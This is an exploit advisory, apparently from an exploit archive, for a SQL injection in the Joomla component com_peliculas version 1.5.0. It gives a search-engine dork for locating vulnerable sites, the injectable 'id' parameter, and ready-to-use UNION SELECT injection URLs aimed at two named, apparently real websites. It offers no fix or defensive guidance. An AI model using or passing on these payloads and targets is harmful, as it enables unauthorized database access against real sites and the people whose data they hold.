id: 18716
date: 06/20/2012
title: Joomla Component com_peliculas Sql Injection Vulnerability
author: AtT4CKxT3rR0r1ST
cves: 

Joomla Component com_peliculas Sql Injection Vulnerability
==============================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://joomlacode.org/gf/download/frsrelease/8828/32610/com_peliculas.zip
.:. Dork           : inurl:"com_peliculas"
.:. Version        : V1.5.0
####################################################################
===[ Exploit ]===

www.site.com/index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection]

Example:

http://www.pasadizo.com/index.php?option=com_peliculas&view=peliculas&id=null+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
http://www.lucenalia.com/index.php?option=com_peliculas&view=peliculas&id=null+and+1=2+union+select+1,2,3,4,5

####################################################################



#  0day.today [2023-03-27]  #